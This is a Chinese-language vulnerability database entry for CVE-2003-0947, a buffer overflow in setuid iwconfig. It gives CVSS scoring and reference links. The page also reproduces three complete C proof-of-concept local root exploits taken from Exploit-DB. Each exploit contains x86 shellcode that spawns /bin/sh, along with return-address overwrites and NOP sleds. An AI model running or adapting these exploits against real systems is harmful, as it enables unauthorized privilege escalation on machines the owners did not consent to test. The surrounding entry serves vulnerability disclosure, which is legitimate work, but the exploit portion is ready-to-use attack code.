CVE-2003-0947
CVSS7.2
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:38:27
NMCOE    

[原文]Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable.


[CNNVD]iwconfig缓冲区溢出漏洞(CNNVD-200312-041)

        iwconfig存在缓冲区溢出漏洞。当安装setuid时,本地用户借助超长OUT环境变量执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0947
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0947
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-041
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106867458902521&w=2
(UNKNOWN)  BUGTRAQ  20031112 iwconfig vulnerability - the last code was demaged sending by email

- 漏洞信息

iwconfig缓冲区溢出漏洞
高危 缓冲区溢出
2003-12-15 00:00:00 2005-10-20 00:00:00
本地  
        iwconfig存在缓冲区溢出漏洞。当安装setuid时,本地用户借助超长OUT环境变量执行任意代码。
        

- 公告与补丁

        

- 漏洞信息 (23299)

IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (1) (EDBID:23299)
linux local
2003-10-27 Verified
0 axis
N/A [点击下载]
source: http://www.securityfocus.com/bid/8901/info

A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

Exploit:
/* PST_iwconfig
   /sbin/iwconfig proof of concept exploit
   coded by aXis@ph4nt0m.net
   Ph4nt0m Security Team
   http://www.ph4nt0m.net
   just for fun
*/

#include<stdio.h>
#include<string.h>
#include<unistd.h>

/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux shellcode */

char shellcode[]= /* 24 bytes */
    "\x31\xc0" /* xorl %eax,%eax */
    "\x50" /* pushl %eax */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp,%ebx */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\x89\xe1" /* movl %esp,%ecx */
    "\x99" /* cltd */
    "\xb0\x0b" /* movb $0x0b,%al */
    "\xcd\x80"; /* int $0x80 */


int main(int argc,char **argv){
   char buf[96];
   unsigned long ret;
   int i;

   char *prog[]={"/sbin/iwconfig",buf,NULL};
   char *env[]={"HOME=/",shellcode,NULL};

   ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
   printf("use ret addr: 0x%x\n",ret);

   memset(buf,0x41,sizeof(buf));
   memcpy(&buf[92],&ret,4);

   execve(prog[0],prog,env);

  }
		

- 漏洞信息 (23300)

IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (2) (EDBID:23300)
linux local
2003-11-11 Verified
0 heka
N/A [点击下载]
source: http://www.securityfocus.com/bid/8901/info
 
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

/*
  Name: iw-config.c
  Copyright: !sh2k+!tc2k
  Author: heka
  Date: 11/11/2003
  Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
  Description: /sbin/iwconfig - local root exploit
  iwconfig manipulate the basic wireless parameters

*/

#include <stdio.h>

#define BIN     "/sbin/iwconfig"

unsigned char shellcode[] =
                  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
                  "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
                  "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
                  "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
                  "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
                  "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
                  "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                  "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
                  "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

int
main ()
{
   int x;
   char buf[97], out[1337], *buffer;
   unsigned long ret_add = 0xbffffbb8, *add_ptr ;
   buffer = buf;
   add_ptr = (long *)buffer;
   for (x=0; x<97-1; x+=4)
   *(add_ptr++)=ret_add;
   memset ((char *)out, 0x90, 1337);
   memcpy ((char *)out + 333, shellcode, strlen(shellcode));
   memcpy((char *)out, "OUT=", 4);
   putenv(out);
   execl (BIN, BIN, buf, NULL);
   return 0;
}

		

- 漏洞信息 (23301)

IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (3) (EDBID:23301)
linux local
2003-10-27 Verified
0 NrAziz
N/A [点击下载]
source: http://www.securityfocus.com/bid/8901/info
  
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

/*
 * (C) 2003 NrAziz
 * polygrithm_at_hotmail[DOT]com
 */

/*
 * Greetz to Mixter,gorny,rave..
 */

/*
 * Description:
 *              iwconfig configures a wireless network interface and is similar to ifconfig
 *  except that iwconfig configures wireless interfaces.
 * Vulnerability:
 *               Instead of giving the interface parameter when a large string is given
 * the buffer overflows :-)...
 */

/*
 * Yet another Proof Of Concept Xploit for 'iwconfig'
 */


#include <stdio.h>
#include <stdlib.h>

#define BUFF_SIZE 98
#define RET 0xbffffc3f

char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

int main(int argc,char **argv)
{

  int i;
  char *buff=(char *)malloc(sizeof(char)*BUFF_SIZE);

  for(i=0;i<BUFF_SIZE;i+=4)
    *(long *)&buff[i]=RET;

  for(i=0;i<BUFF_SIZE-strlen(shellcode)-12;i++)
    *(buff+i)=0x90;

  memcpy(buff+i,shellcode,strlen(shellcode));

  execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);

  return 0;
}
		

- 漏洞信息

11752
iwconfig Long Multiple Environment Variable Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-10-27 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站